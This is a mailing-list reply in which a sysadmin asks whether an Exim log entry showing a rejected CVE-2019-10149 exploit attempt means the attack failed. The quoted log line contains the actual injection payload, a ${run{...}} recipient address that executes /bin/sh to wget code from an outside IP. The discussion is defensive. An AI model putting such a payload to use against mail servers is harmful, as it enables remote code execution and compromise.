gpg: Signature made Sun Jun 23 06:20:59 2019 UTC
gpg: using RSA key C0E6128BC8C4B6F8770FA62AB265A6CAA060392F
gpg: Can't check signature: No public key
On 23/06/2019 04:24, Andy Smith wrote:
> Hello,
>
> I've just ran a grep on all of my mail logs for the string "run{" to
> see who's been trying to exploit CVE-2019-10149. A successful match
> looks like this on my MTA (Exim):
>
> 2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}@???>: Unrouteable address
Am I right in thinking that the fact that the log entry says "rejected
RCPT" etc. means that the attack has been thwarted?
Cheers,
John
--
Xronos Scheduler -
https://xronos.uk/
All your school's schedule information in one place.
Timetable, activities, homework, public events - the lot
Live demo at
https://schedulerdemo.xronos.uk/
